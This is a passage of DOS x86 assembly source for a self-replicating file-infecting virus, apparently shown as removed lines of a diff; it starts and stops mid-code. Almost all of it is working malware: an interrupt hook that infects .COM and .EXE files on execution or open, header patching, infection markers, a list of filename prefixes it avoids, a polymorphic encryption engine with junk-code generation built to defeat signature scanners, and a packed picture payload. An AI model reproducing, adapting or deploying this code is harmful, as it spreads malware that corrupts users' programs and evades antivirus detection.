;rnd init ? 
- jne not_ri - call rnd_init - jmp short no_infect - -not_ri: cmp ax,33DC ;show picture? - je show_pic - -not_pi: cmp ax,4B00 ;execute ? - je do_it - - cmp ax,6C00 ;open DOS 4.0+ ? - jne no_infect - test bl,3 - jnz no_infect - mov dx,di - -do_it: call infect - -no_infect: pop ax ;restore registers - pop bx - pop cx - pop dx - pop di - pop si - pop ds - pop es - popf - -org21: jmp dword ptr cs:[oi21] ;call to old int-handler - - -;****************************************************************************** -;* Show picture -;****************************************************************************** - -show_pic: mov ax,offset no_infect ;push return adres on stack - push cs - push ax - - mov di,((VIRPAR*10)+0100) ;move picture routine - mov si,offset beeld - mov cx,PICLEN - push cs - pop ds - push cs - pop es - rep movsb - - mov ax,cs ;calculate segment registers - add ax,low VIRPAR - mov ds,ax - mov es,ax - - push ax ;push picture adres on stack - mov ax,0100 - push ax - - db 0CBh ;(retf) goto picture routine - - -;****************************************************************************** -;* Tries to infect the file -;****************************************************************************** - -infect: cld - - push cs ;copy filename to CS:0000 - pop es - mov si,dx - xor di,di - mov cx,0080 -namemove: lodsb - cmp al,0 - je moved - cmp al,'a' - jb char_ok - cmp al,'z' - ja char_ok - xor al,20 ;convert to upper case -char_ok: stosb - loop namemove -return0: ret - -moved: stosb ;put last zero after filename - lea si,[di-5] - push cs - pop ds - - lodsw ;check extension .COM or .EXE - cmp ax,'E.' - jne not_exe - lodsw - cmp ax,'EX' - jmp short check - -not_exe: cmp ax,'C.' 
- jne return0 - lodsw - cmp ax,'MO' -check: jne return0 - - std ;find begin of filename - mov cx,si - inc cx -searchbegin: lodsb - cmp al,':' - je checkname - cmp al,'\' - je checkname - loop searchbegin - dec si - -checkname: cld ;check filename - lodsw - lodsw - mov di,offset names - mov cl,13 - repnz scasw - je return0 - - mov ax,3300 ;get ctrl-break flag - int 21 - push dx ;save flag on stack - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524 ;get int24 vector - int 21 - push es ;save vector on stack - push bx - - push cs - pop ds - - mov dx,offset ni24 ;install new int24 handler - mov ah,25 - push ax - int 21 - - mov ax,4300 ;ask file-attributes - cwd - int 21 - push cx ;save attributes on stack - - xor cx,cx ;clear attributes - mov ax,4301 - push ax - int 21 - jc return1v - - mov ax,3D02 ;open the file - int 21 - jnc opened -return1v: jmp return1 - -opened: xchg ax,bx ;save handle - - mov ax,5700 ;get file date & time - int 21 - push dx ;save date & time on stack - push cx - - mov cx,BUFLEN ;read begin of file - mov si,offset buffer - mov dx,si - call read - jc closev - - mov ax,4202 ;goto end, get filelength - xor cx,cx - cwd - int 21 - - mov di,offset oldlen ;save filelength - mov [di],ax - mov [di+2],dx - - mov ax,word ptr [si+12] ;already infected? - add al,ah - cmp al,'@' - jz closev - - cmp word ptr [si],'ZM' ;EXE ? - je do_EXE - -do_COM: test byte ptr [si],80 ;maybe a strange EXE? - jz closev - - mov ax,word ptr [di] ;check lenght of file - cmp ah,0D0 - jae closev - cmp ah,1 - jb closev - - mov dx,ax - add dx,0100 - call writeprog ;call Engine and write virus - jne closev - - mov byte ptr [si],0E9 ;put 'JMP xxxx' at begin - sub ax,low 3 - mov word ptr [si+1],ax - jmp done - -closev: jmp close - -do_EXE: cmp word ptr [si+18],40 ;is it a windows/OS2 EXE ? 
- jb not_win - - mov ax,003C - cwd - call readbytes - jc closev - - mov ax,word ptr [di+8] - mov dx,word ptr [di+0A] - call readbytes - jc closev - - cmp byte ptr [di+9],'E' - je closev - -not_win: call getlen - call calclen ;check for internal overlays - cmp word ptr [si+4],ax - jne close - cmp word ptr [si+2],dx - jne close - - cmp word ptr [si+0C],0 ;high memory allocation? - je close - - cmp word ptr [si+1A],0 ;overlay nr. not zero? - jne close - - call getlen ;calculate new CS & IP - mov cx,0010 - div cx - sub ax,word ptr [si+8] - dec ax - add dx,low 10 - - call writeprog ;call Engine and write virus - jne close - - mov word ptr [si+16],ax ;put CS in header - mov word ptr [si+0E],ax ;put SS in header - mov word ptr [si+14],dx ;put IP in header - mov word ptr [si+10],STACKOFF ;put SP in header - - call getlen - add ax,cx - adc dx,0 - call calclen ;put new length in header - mov word ptr [si+4],ax - mov word ptr [si+2],dx - - lea di,[si+0A] ;adjust mem. allocation info - call mem_adjust - lea di,[si+0C] - call mem_adjust - -done: call gotobegin - call rnd_get ;signature - mov ah,'@' - sub ah,al - mov word ptr [si+12],ax - mov cx,BUFLEN ;write new begin - mov dx,si - mov ah,40 - int 21 - -close: pop cx ;restore date & time - pop dx - mov ax,5701 - int 21 - - mov ah,3E ;close the file - int 21 - -return1: pop ax ;restore attributes - pop cx - cwd - int 21 - - pop ax ;restore int24 vector - pop dx - pop ds - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - ret - - -;****************************************************************************** -;* Filenames to avoid -;****************************************************************************** - -names: db 'CO', 'SC', 'CL', 'VS', 'NE', 'HT', 'TB', 'VI' - db 'FI', 'GI', 'RA', 'FE', 'MT', 'BR', 'IM', ' ' - db ' ', ' ', ' ' - - -;****************************************************************************** -;* Write virus to the program 
-;****************************************************************************** - -writeprog: push ax ;save registers - push dx - push si - push bp - push es - - cli - mov word ptr [di-4],ss ;save SS & SP - mov word ptr [di-2],sp - - mov ax,cs ;new stack & buffer-segment - mov ss,ax - mov sp,((VIRPAR + WORKPAR) * 10) - add ax,low VIRPAR - mov es,ax - sti - - push ds - - mov bp,dx ;input parameters for engine - mov dx,0100 - mov cx,FILELEN - xor si,si - mov al,0Fh - - push di - push bx - - call crypt ;call the Engine - - pop bx - pop di - - push cx - push dx - mov ax,4202 ;goto end - xor cx,cx - cwd - int 21 - pop dx - pop cx - - mov ah,40 ;write virus - int 21 - cmp ax,cx ;are all bytes written? - - pop ds - - cli - mov ss,word ptr [di-4] ;restore stack - mov sp,word ptr [di-2] - sti - - pop es ;restore registers - pop bp - pop si - pop dx - pop ax - - ret - - -;****************************************************************************** -;* Adjust mem allocation info in EXE header -;****************************************************************************** - -mem_adjust: mov ax,[di] - sub ax,low FILEPAR ;alloc. 
may be this much less - jb more - cmp ax,DATAPAR ;minimum amount to allocate - jae mem_ok -more: mov ax,DATAPAR -mem_ok: mov [di],ax - ret - - -;****************************************************************************** -;* Read a few bytes -;****************************************************************************** - -readbytes: call goto - mov dx,offset minibuf - mov cx,4 -read: mov ah,3F - int 21 - ret - - -;****************************************************************************** -;* Calculate length for EXE header -;****************************************************************************** - -calclen: mov cx,0200 - div cx - or dx,dx - jz no_cor - inc ax -no_cor: ret - - -;****************************************************************************** -;* Get original length of program -;****************************************************************************** - -getlen: mov ax,[di] - mov dx,[di+2] - ret - - -;****************************************************************************** -;* Goto new offset DX:AX -;****************************************************************************** - -gotobegin: xor ax,ax - cwd -goto: xchg cx,dx - xchg ax,dx - mov ax,4200 - int 21 - ret - - -;**************************************************************************** -;* -;* Encryption Engine -;* -;* -;* Input: ES work segment -;* DS:DX code to encrypt -;* BP what will be start of decryptor -;* SI what will be distance between decryptor and code -;* CX length of code -;* AX flags: bit 0: DS will not be equal to CS -;* bit 1: insert random instructions -;* bit 2: put junk before decryptor -;* bit 3: preserve AX with decryptor -;* -;* Output: ES: work segment (preserved) -;* DS:DX decryptor + encrypted code -;* BP what will be start of decryptor (preserved) -;* DI length of decryptor / offset of encrypted code -;* CX length of decryptor + encrypted code -;* AX length of encrypted code -;* (other registers may be trashed) -;* 
-;**************************************************************************** - - db '[ MK / Trident ]' - -crypt: xor di,di ;di = start of decryptor - push dx ;save offset of code - push si ;save future offset of code - - mov byte ptr ds:[flags],al ;save flags - test al,8 ;push AX? - jz no_push - mov al,50 - stosb - -no_push: call rnd_get ;add a few bytes to cx - and ax,1F - add cx,ax - push cx ;save length of code - - call rnd_get ;get random flags - xchg ax,bx - ;BX flags: - - ;0,1 how to encrypt - ;2,3 which register for encryption - ;4 use byte or word for encrypt - ;5 MOV AL, MOV AH or MOV AX - ;6 MOV CL, MOV CH or MOV CX - ;7 AX or DX - - ;8 count up or down - ;9 ADD/SUB/INC/DEC or CMPSW/SCASW - ;A ADD/SUB or INC/DEC - ; CMPSW or SCASW - ;B offset in XOR instruction? - ;C LOOPNZ or LOOP - ; SUB CX or DEC CX - ;D carry with crypt ADD/SUB - ;E carry with inc ADD/SUB - ;F XOR instruction value or AX/DX - -random: call rnd_get ;get random encryption value - or al,al - jz random ;again if 0 - mov ds:[xor_val],ax - - call do_junk ;insert random instructions - - pop cx - - mov ax,0111 ;make flags to remember which - test bl,20 ; MOV instructions are used - jnz z0 - xor al,07 -z0: test bl,0C - jnz z1 - xor al,70 -z1: test bl,40 - jnz z2 - xor ah,7 -z2: test bl,10 - jnz z3 - and al,73 -z3: test bh,80 - jnz z4 - and al,70 - -z4: mov dx,ax -mov_lup: call rnd_get ;put MOV instructions in - and ax,000F ; a random order - cmp al,0A - ja mov_lup - - mov si,ax - push cx ;test if MOV already done - xchg ax,cx - mov ax,1 - shl ax,cl - mov cx,ax - and cx,dx - pop cx - jz mov_lup - xor dx,ax ;remember which MOV done - - push dx - call do_mov ;insert MOV instruction - call do_nop ;insert a random NOP - pop dx - - or dx,dx ;all MOVs done? - jnz mov_lup - - push di ;save start of decryptor loop - - call do_add_ax ;add a value to AX in loop? - call do_nop - test bh,20 ;carry with ADD/SUB ? 
- jz no_clc - mov al,0F8 - stosb -no_clc: mov word ptr ds:[xor_offset],0 - call do_xor ;place all loop instructions - call do_nop - call do_add - - pop dx ;get start of decryptor loop - - call do_loop - - test byte ptr ds:[flags],8 ;insert POP AX ? - jz no_pop - mov al,58 - stosb - -no_pop: xor ax,ax ;calculate loop offset - test bh,1 ;up or down? - jz v1 - mov ax,cx - dec ax - test bl,10 ;encrypt with byte or word? - jz v1 - and al,0FE -v1: add ax,di - add ax,bp - pop si - add ax,si - sub ax,word ptr ds:[xor_offset] - mov si,word ptr ds:[where_len] - test bl,0C ;are BL,BH used for encryption? - jnz v2 - mov byte ptr es:[si],al - mov si,word ptr ds:[where_len2] - mov byte ptr es:[si],ah - jmp short v3 -v2: mov word ptr es:[si],ax - -v3: mov dx,word ptr ds:[xor_val] ;encryption value - - pop si ;ds:si = start of code - - push di ;save ptr to encrypted code - push cx ;save length of encrypted code - - test bl,10 ;byte or word? - jz blup - - inc cx ;cx = # of crypts (words) - shr cx,1 - -lup: lodsw ;encrypt code (words) - call do_encrypt - stosw - loop lup - jmp short klaar - - -blup: lodsb ;encrypt code (bytes) - xor dh,dh - call do_encrypt - stosb - loop blup - -klaar: mov cx,di ;cx = length decryptpr + code - pop ax ;ax = length of decrypted code - pop di ;di = offset encrypted code - xor dx,dx ;ds:dx = decryptor + cr. code - push es - pop ds - ret - - -;**************************************************************************** -;* encrypt the code -;**************************************************************************** - -do_encrypt: add dx,word ptr ds:[add_val] - test bl,2 - jnz lup1 - xor ax,dx - ret - -lup1: test bl,1 - jnz lup2 - sub ax,dx - ret - -lup2: add ax,dx - ret - - -;**************************************************************************** -;* generate mov reg,xxxx -;**************************************************************************** - -do_mov: mov dx,si - mov al,byte ptr ds:[si+mov_byte] - cmp dl,4 ;BX? 
- jne is_not_bx - call add_ind -is_not_bx: test dl,0C ;A*? - pushf - jnz is_not_a - test bl,80 ;A* or D*? - jz is_not_a - add al,2 - -is_not_a: call alter ;insert the MOV - - popf ;A*? - jnz is_not_a2 - mov ax,word ptr ds:[xor_val] - jmp short sss - -is_not_a2: test dl,8 ;B*? - jnz is_not_b - mov si,offset where_len - test dl,2 - jz is_not_bh - add si,2 -is_not_bh: mov word ptr ds:[si],di - jmp short sss - -is_not_b: mov ax,cx ;C* - test bl,10 ;byte or word encryption? - jz sss - inc ax ;only half the number of bytes - shr ax,1 -sss: test dl,3 ;byte or word register? - jz is_x - test dl,2 ;*H? - jz is_not_h - xchg al,ah -is_not_h: stosb - ret - -is_x: stosw - ret - - -;**************************************************************************** -;* insert MOV or alternative for MOV -;**************************************************************************** - -alter: push bx - push cx - push ax - call rnd_get - xchg ax,bx - pop ax - test bl,3 ;use alternative for MOV? - jz no_alter - - push ax - and bx,0F - and al,08 - shl ax,1 - or bx,ax - pop ax - - and al,7 - mov cl,9 - xchg ax,cx - mul cl - - add ax,30C0 - xchg al,ah - test bl,4 - jz no_sub - mov al,28 -no_sub: call maybe_2 - stosw - - mov al,80 - call maybe_2 - stosb - - mov ax,offset add_mode - xchg ax,bx - and ax,3 - xlat - - add al,cl -no_alter: stosb - pop cx - pop bx - ret - - -;**************************************************************************** -;* insert ADD AX,xxxx -;**************************************************************************** - -do_add_ax: push cx - mov si,offset add_val ;save add-value here - mov word ptr ds:[si],0 - mov ax,bx - and ax,8110 - xor ax,8010 - jnz no_add_ax ;use ADD? - - mov ax,bx - xor ah,ah - mov cl,3 - div cl - or ah,ah - jnz no_add_ax ;use ADD? - - test bl,80 - jnz do_81C2 ;AX or DX? 
- mov al,5 - stosb - jmp short do_add0 -do_81C2: mov ax,0C281 - stosw -do_add0: call rnd_get - mov word ptr ds:[si],ax - stosw -no_add_ax: pop cx - ret - - -;**************************************************************************** -;* generate encryption command -;**************************************************************************** - -do_xor: test byte ptr ds:[flags],1 - jz no_cs - mov al,2E ;insert CS: instruction - stosb - -no_cs: test bh,80 ;type of XOR command - jz xor1 - - call get_xor ;encrypt with register - call do_carry - call save_it - xor ax,ax - test bl,80 - jz xxxx - add al,10 -xxxx: call add_dir - test bh,8 - jnz yyyy - stosb - ret - -yyyy: or al,80 - stosb - call rnd_get - stosw - mov word ptr ds:[xor_offset],ax - ret - -xor1: mov al,080 ;encrypt with value - call save_it - call get_xor - call do_carry - call xxxx - mov ax,word ptr ds:[xor_val] - test bl,10 - jmp byte_word - - -;**************************************************************************** -;* generate increase/decrease command -;**************************************************************************** - -do_add: test bl,8 ;no CMPSW/SCASW if BX is used - jz da0 - test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW - jnz do_cmpsw - -da0: test bh,4 ;ADD/SUB or INC/DEC? - jz add1 - - mov al,40 ;INC/DEC - test bh,1 ;up or down? - jz add0 - add al,8 -add0: call add_ind - stosb - test bl,10 ;byte or word? - jz return - stosb ;same instruction again -return: ret - -add1: test bh,40 ;ADD/SUB - jz no_clc2 ;carry? - mov al,0F8 ;insert CLC - stosb -no_clc2: mov al,083 - stosb - mov al,0C0 - test bh,1 ;up or down? - jz add2 - mov al,0E8 -add2: test bh,40 ;carry? - jz no_ac2 - and al,0CF - or al,10 -no_ac2: call add_ind - stosb - mov al,1 ;value to add/sub -save_it: call add_1 - stosb - ret - -do_cmpsw: test bh,1 ;up or down? - jz no_std - mov al,0FDh ;insert STD - stosb -no_std: test bh,4 ;CMPSW or SCASW? 
- jz normal_cmpsw - test bl,4 ;no SCASW if SI is used - jnz do_scasw - -normal_cmpsw: mov al,0A6 ;CMPSB - jmp short save_it -do_scasw: mov al,0AE ;SCASB - jmp short save_it - - -;**************************************************************************** -;* generate loop command -;**************************************************************************** - -do_loop: test bh,1 ;no JNE if couting down - jnz loop_loop ; (prefetch bug!) - call rnd_get - test al,1 ;LOOPNZ/LOOP or JNE? - jnz cx_loop - -loop_loop: mov al,0E0 - test bh,1A ;LOOPNZ or LOOP? - jz ll0 ; no LOOPNZ if xor-offset - add al,2 ; no LOOPNZ if CMPSW/SCASW -ll0: stosb - mov ax,dx - sub ax,di - dec ax - stosb - ret - -cx_loop: test bh,10 ;SUB CX or DEC CX? - jnz cxl_dec - mov ax,0E983 - stosw - mov al,1 - stosb - jmp short do_jne - -cxl_dec: mov al,49 - stosb -do_jne: mov al,75 - jmp short ll0 - - -;**************************************************************************** -;* add value to AL depending on register type -;**************************************************************************** - -add_dir: mov si,offset dir_change - jmp short xx1 - -add_ind: mov si,offset ind_change -xx1: push bx - shr bl,1 - shr bl,1 - and bx,3 - add al,byte ptr ds:[bx+si] - pop bx - ret - - -;**************************************************************************** -;* mov encryption command byte to AL -;**************************************************************************** - -get_xor: push bx - mov ax,offset how_mode - xchg ax,bx - and ax,3 - xlat - pop bx - ret - - -;**************************************************************************** -;* change ADD into ADC -;**************************************************************************** - -do_carry: test bl,2 ;ADD/SUB used for encryption? - jz no_ac - test bh,20 ;carry with (encr.) ADD/SUB? 
- jz no_ac - and al,0CF - or al,10 -no_ac: ret - - -;**************************************************************************** -;* change AL (byte/word) -;**************************************************************************** - -add_1: test bl,10 - jz add_1_ret - inc al -add_1_ret: ret - - -;**************************************************************************** -;* change AL (byte/word) -;**************************************************************************** - -maybe_2: call add_1 - cmp al,81 ;can't touch this - je maybe_not - push ax - call rnd_get - test al,1 - pop ax - jz maybe_not - add al,2 -maybe_not: ret - - -;**************************************************************************** -;* get random nop (or not) -;**************************************************************************** - -do_nop: test byte ptr ds:[flags],2 - jz no_nop -yes_nop: call rnd_get - test al,3 - jz nop8 - test al,2 - jz nop16 - test al,1 - jz nop16x -no_nop: ret - - -;**************************************************************************** -;* Insert random instructions -;**************************************************************************** - -do_junk: test byte ptr ds:[flags],4 - jz no_junk - call rnd_get ;put a random number of - and ax,0F ; dummy instructions before - inc ax ; decryptor - xchg ax,cx -junk_loop: call junk - loop junk_loop -no_junk: ret - - -;**************************************************************************** -;* get rough random nop (may affect register values) -;**************************************************************************** - -junk: call rnd_get - and ax,1E - jmp short aa0 -nop16x: call rnd_get - and ax,06 -aa0: xchg ax,si - call rnd_get - jmp word ptr ds:[si+junkcals] - - -;**************************************************************************** -;* NOP and junk addresses -;**************************************************************************** - -junkcals dw offset nop16x0 - dw offset nop16x1 
- dw offset nop16x2 - dw offset nop16x3 - dw offset nop8 - dw offset nop16 - dw offset junk6 - dw offset junk7 - dw offset junk8 - dw offset junk9 - dw offset junkA - dw offset junkB - dw offset junkC - dw offset junkD - dw offset junkE - dw offset junkF - - -;**************************************************************************** -;* NOP and junk routines -;**************************************************************************** - -nop16x0: and ax,000F ;J* 0000 (conditional) - or al,70 - stosw - ret - - -nop16x1: mov al,0EBh ;JMP xxxx / junk - and ah,07 - inc ah - stosw - xchg al,ah ;get lenght of bullshit - cbw - jmp fill_bullshit - - -nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg - stosb - ret - - -nop16x3: call junkF ;INC / DEC or DEC / INC - xor al,8 - stosb - ret - - -nop8: push bx ;8-bit NOP - and al,7 - mov bx,offset nop_data8 - xlat - stosb - pop bx - ret - - -nop16: push bx ;16-bit NOP - and ax,0303 - mov bx,offset nop_data16 - xlat - add al,ah - stosb - call rnd_get - and al,7 - mov bl,9 - mul bl - add al,0C0 - stosb - pop bx - ret - - -junk6: push cx ;CALL xxxx / junk / POP reg - mov al,0E8 - and ah,0F - inc ah - stosw - xor al,al - stosb - xchg al,ah - call fill_bullshit - call do_nop - call rnd_get ;insert POP reg - and al,7 - call no_sp - mov cx,ax - or al,58 - stosb - - test ch,3 ;more? 
- jnz junk6_ret - - call do_nop - mov ax,0F087 ;insert XCHG SI,reg - or ah,cl - test ch,8 - jz j6_1 - mov al,8Bh -j6_1: stosw - - call do_nop - push bx - call rnd_get - xchg ax,bx - and bx,0F7FBh ;insert XOR [SI],xxxx - or bl,8 - call do_xor - pop bx -junk6_ret: pop cx - ret - - -junk7: and al,0F ;MOV reg,xxxx - or al,0B0 - call no_sp - stosb - test al,8 - pushf - call rnd_get - popf - jmp short byte_word - - -junk8: and ah,39 ;DO r/m,r(8/16) - or al,0C0 - call no_sp - xchg al,ah - stosw - ret - - -junk9: and al,3Bh ;DO r(8/16),r/m - or al,2 - and ah,3F - call no_sp2 - call no_bp - stosw - ret - - -junkA: and ah,1 ;DO rm,xxxx - or ax,80C0 - call no_sp - xchg al,ah - stosw - test al,1 - pushf - call rnd_get - popf - jmp short byte_word - - -junkB: call nop8 ;NOP / LOOP - mov ax,0FDE2 - stosw - ret - - -junkC: and al,09 ;CMPS* or SCAS* - test ah,1 - jz mov_test - or al,0A6 - stosb - ret -mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx - stosb - cmp al,0A8 - pushf - call rnd_get - popf - jmp short byte_word - - -junkD: and al,07 ;XCHG AX,reg - or al,90 - call no_sp - stosb - ret - - -junkE: and ah,07 ;PUSH reg / POP reg - or ah,50 - mov al,ah - or ah,08 - stosw - ret - - -junkF: and al,0F ;INC / DEC - or al,40 - call no_sp - stosb - ret - - -;**************************************************************************** -;* store a byte or a word -;**************************************************************************** - -byte_word: jz only_byte - stosw - ret - -only_byte: stosb - ret - - -;**************************************************************************** -;* don't fuck with SP! -;**************************************************************************** - -no_sp: push ax - and al,7 - cmp al,4 - pop ax - jnz no_sp_ret - and al,0FBh -no_sp_ret: ret - - -;**************************************************************************** -;* don't fuck with SP! 
-;**************************************************************************** - -no_sp2: push ax - and ah,38 - cmp ah,20 - pop ax - jnz no_sp2_ret - xor ah,20 -no_sp2_ret: ret - - -;**************************************************************************** -;* don't use [BP+..] -;**************************************************************************** - -no_bp: test ah,4 - jnz no_bp2 - and ah,0FDh - ret - -no_bp2: push ax - and ah,7 - cmp ah,6 - pop ax - jnz no_bp_ret - or ah,1 -no_bp_ret: ret - - -;**************************************************************************** -;* write byte for JMP/CALL and fill with random bullshit -;**************************************************************************** - -fill_bullshit: push cx - xchg ax,cx -bull_lup: call rnd_get - stosb - loop bull_lup - pop cx - ret - - -;**************************************************************************** -;* random number generator (stolen from 'Bomber') -;**************************************************************************** - -rnd_init: push cx - call rnd_init0 ;init - and ax,000F - inc ax - xchg ax,cx -random_lup: call rnd_get ;call random routine a few - loop random_lup ; times to 'warm up' - pop cx - ret - -rnd_init0: push dx ;initialize generator - push cx - mov ah,2C - int 21 - in al,40 - mov ah,al - in al,40 - xor ax,cx - xor dx,ax - jmp short move_rnd - -rnd_get: push dx ;calculate a random number - push cx - push bx - mov ax,0 ;will be: mov ax,xxxx - mov dx,0 ; and mov dx,xxxx - mov cx,7 -rnd_lup: shl ax,1 - rcl dx,1 - mov bl,al - xor bl,dh - jns rnd_l2 - inc al -rnd_l2: loop rnd_lup - pop bx - -move_rnd: mov word ptr ds:[rnd_get+4],ax - mov word ptr ds:[rnd_get+7],dx - mov al,dl - pop cx - pop dx - ret - - -;**************************************************************************** -;* tables for engine -;**************************************************************************** - - ; AX AL AH (BX) BL BH CX CL CH -mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 
0B3, 0B7, 0, 0B9, 0B1, 0B5 - - ; nop clc stc cmc cli cld incbp decbp -nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh - - ; or and xchg mov -nop_data16 db 8, 20, 84, 88 - - ; bl/bh, bx, si di -dir_change db 07, 07, 04, 05 -ind_change db 03, 03, 06, 07 - - - ; xor xor add sub -how_mode db 30, 30, 00, 28 - - ; ? add xor or -add_mode db 0, 0C8, 0F0, 0C0 - - -;**************************************************************************** -;* text + buffer -;**************************************************************************** - - db ' Amsterdam = COFFEESHOP! ' - -buffer db 0CDh, 20 ;original code of dummy program - db (BUFLEN-2) dup (?) - - -;**************************************************************************** -;* the (packed) picture routine -;**************************************************************************** - -beeld db 0BFh, 0A1h, 015h, 090h, 090h, 090h, 090h, 090h - db 090h, 090h, 090h, 0BEh, 0F9h, 003h, 0B9h, 06Bh - db 001h, 0FDh, 0F3h, 0A5h, 0FCh, 08Bh, 0F7h, 0BFh - db 000h, 001h, 0ADh, 0ADh, 08Bh, 0E8h, 0B2h, 010h - db 0E9h, 036h, 014h, 04Fh, 08Fh, 07Fh, 0FCh, 0B4h - db 00Fh, 0CDh, 010h, 0B4h, 000h, 050h, 0FBh, 0B7h - db 0B0h, 03Ch, 007h, 074h, 0FFh, 0FFh, 00Ah, 03Ch - db 004h, 073h, 028h, 0B7h, 0B8h, 03Ch, 002h, 072h - db 022h, 08Eh, 0C3h, 0BEh, 040h, 001h, 0FFh, 0FFh - db 0B0h, 019h, 057h, 0B1h, 050h, 0F3h, 0A5h, 05Fh - db 081h, 0C7h, 0A0h, 000h, 0FEh, 0C8h, 075h, 0F2h - db 003h, 08Fh, 0B8h, 007h, 00Eh, 0D6h, 0FBh, 00Ch - db 0CDh, 021h, 058h, 0F8h, 063h, 0A7h, 0CBh, 020h - db 002h, 0FEh, 020h, 000h, 0FAh, 0EBh, 0B0h, 0FCh - db 0F8h, 003h, 077h, 0F0h, 0E0h, 0D0h, 041h, 00Fh - db 0C0h, 02Fh, 007h, 01Dh, 080h, 06Fh, 0BAh, 0DCh - db 0E1h, 034h, 0DBh, 00Ch, 0F8h, 0F0h, 00Eh, 0DFh - db 0FEh, 0F4h, 0F8h, 0BBh, 0AEh, 0F8h, 0E4h, 003h - db 084h, 0E0h, 0FCh, 0EBh, 0B0h, 0E6h, 0EAh, 0A3h - db 083h, 0DAh, 0AAh, 00Eh, 0DCh, 009h, 0BAh, 0C8h - db 001h, 03Ah, 0F0h, 050h, 007h, 0A2h, 0E8h, 0E0h - db 0ACh, 005h, 0DBh, 00Eh, 077h, 00Fh, 0F8h, 0DCh - db 
0F6h, 0BAh, 0AEh, 0F0h, 0F6h, 0EBh, 03Ah, 0F0h - db 0F4h, 0E0h, 040h, 017h, 0FAh, 0ECh, 01Dh, 072h - db 0DFh, 0DAh, 0D2h, 074h, 0F8h, 0BAh, 0DDh, 020h - db 01Dh, 074h, 0DEh, 020h, 0AAh, 007h, 0BAh, 0D8h - db 061h, 0F8h, 047h, 087h, 0F8h, 0E8h, 0E1h, 0E8h - db 0F8h, 092h, 0F4h, 000h, 01Dh, 060h, 0D8h, 0E8h - db 009h, 0DCh, 0FEh, 009h, 0F8h, 0B0h, 023h, 0F8h - db 05Ch, 0D7h, 0FCh, 0F8h, 0FCh, 0E8h, 001h, 03Bh - db 0F4h, 0ECh, 080h, 0D2h, 01Dh, 0BEh, 0BAh, 05Ch - db 020h, 07Ch, 003h, 075h, 060h, 0CAh, 020h, 00Eh - db 0B2h, 0D8h, 081h, 0F0h, 03Bh, 040h, 092h, 0D7h - db 0B5h, 0CEh, 0F8h, 0DCh, 060h, 0A7h, 041h, 0DEh - db 060h, 002h, 0B5h, 0BEh, 03Ch, 020h, 00Fh, 07Bh - db 022h, 065h, 007h, 01Dh, 060h, 06Eh, 084h, 0CCh - db 0DFh, 00Dh, 020h, 0C0h, 0B3h, 020h, 02Fh, 060h - db 041h, 01Eh, 06Ah, 0DEh, 07Eh, 00Ah, 042h, 0E0h - db 009h, 0E4h, 0C0h, 075h, 030h, 060h, 00Bh, 0DFh - db 01Ch, 0F4h, 0E4h, 042h, 04Fh, 05Eh, 05Eh, 041h - db 09Ah, 022h, 006h, 02Bh, 01Ch, 080h, 060h, 03Eh - db 084h, 057h, 005h, 0CAh, 046h, 0A4h, 0D0h, 07Bh - db 053h, 07Ah, 097h, 005h, 015h, 0C2h, 004h, 020h - db 01Dh, 054h, 060h, 001h, 0C8h, 051h, 041h, 0E8h - db 0DCh, 006h, 054h, 0BEh, 077h, 0D8h, 02Dh, 078h - db 07Ah, 050h, 055h, 001h, 004h, 020h, 05Dh, 007h - db 076h, 02Eh, 0AEh, 03Ah, 0C6h, 062h, 0E8h, 0A0h - db 055h, 05Eh, 009h, 0A2h, 002h, 0C0h, 020h, 057h - db 084h, 0C6h, 0D0h, 004h, 01Dh, 02Ah, 05Dh, 05Eh - db 0D6h, 016h, 017h, 080h, 098h, 0A4h, 040h, 003h - db 050h, 0EAh, 0ACh, 05Dh, 005h, 062h, 0C4h, 01Dh - db 070h, 059h, 05Eh, 0C4h, 067h, 005h, 082h, 0DCh - db 020h, 002h, 005h, 060h, 020h, 0E4h, 090h, 062h - db 019h, 0D4h, 094h, 065h, 0ECh, 00Eh, 069h, 05Eh - db 0CFh, 007h, 0A0h, 070h, 020h, 0B0h, 0A2h, 0B2h - db 083h, 00Ah, 062h, 069h, 0CCh, 03Bh, 060h, 05Eh - db 0D5h, 002h, 0BEh, 080h, 070h, 090h, 062h, 004h - db 072h, 083h, 055h, 0FEh, 06Eh, 010h, 041h, 040h - db 041h, 0AEh, 0FEh, 0CEh, 075h, 034h, 09Eh, 0FEh - db 002h, 071h, 05Ch, 0BAh, 0AAh, 0E6h, 0CCh, 018h - db 072h, 0C0h, 062h, 040h, 
00Eh, 06Ch, 07Bh, 047h - db 0F2h, 0BCh, 005h, 015h, 028h, 050h, 026h, 0E1h - db 070h, 0FEh, 052h, 05Fh, 068h, 009h, 0FEh, 0BEh - db 040h, 010h, 02Ah, 0F2h, 0AEh, 0E0h, 03Ah, 070h - db 0FEh, 0FCh, 06Ah, 04Ah, 050h, 0DEh, 061h, 0ACh - db 061h, 0C7h, 050h, 00Eh, 001h, 03Eh, 072h, 060h - db 048h, 08Eh, 00Ah, 06Ah, 096h, 03Ah, 0E8h, 002h - db 066h, 058h, 084h, 0B0h, 045h, 0B4h, 007h, 020h - db 05Ah, 0EAh, 0E9h, 0C0h, 044h, 02Dh, 060h, 0E8h - db 093h, 0A0h, 09Eh, 073h, 048h, 050h, 0C6h, 0FFh - db 0F0h, 041h, 0D3h, 0FFh, 060h, 040h, 001h, 0FFh - db 0D1h, 0EDh, 0FEh, 0CAh, 075h, 005h, 0ADh, 08Bh - db 0E8h, 0B2h, 010h, 0C3h, 0E8h, 0F1h, 0FFh, 0D0h - db 0D7h, 0E8h, 0ECh, 0FFh, 072h, 014h, 0B6h, 002h - db 0B1h, 003h, 0E8h, 0E3h, 0FFh, 072h, 009h, 0E8h - db 0DEh, 0FFh, 0D0h, 0D7h, 0D0h, 0E6h, 0E2h, 0F2h - db 02Ah, 0FEh, 0B6h, 002h, 0B1h, 004h, 0FEh, 0C6h - db 0E8h, 0CDh, 0FFh, 072h, 010h, 0E2h, 0F7h, 0E8h - db 0C6h, 0FFh, 073h, 00Dh, 0FEh, 0C6h, 0E8h, 0BFh - db 0FFh, 073h, 002h, 0FEh, 0C6h, 08Ah, 0CEh, 0EBh - db 02Ah, 0E8h, 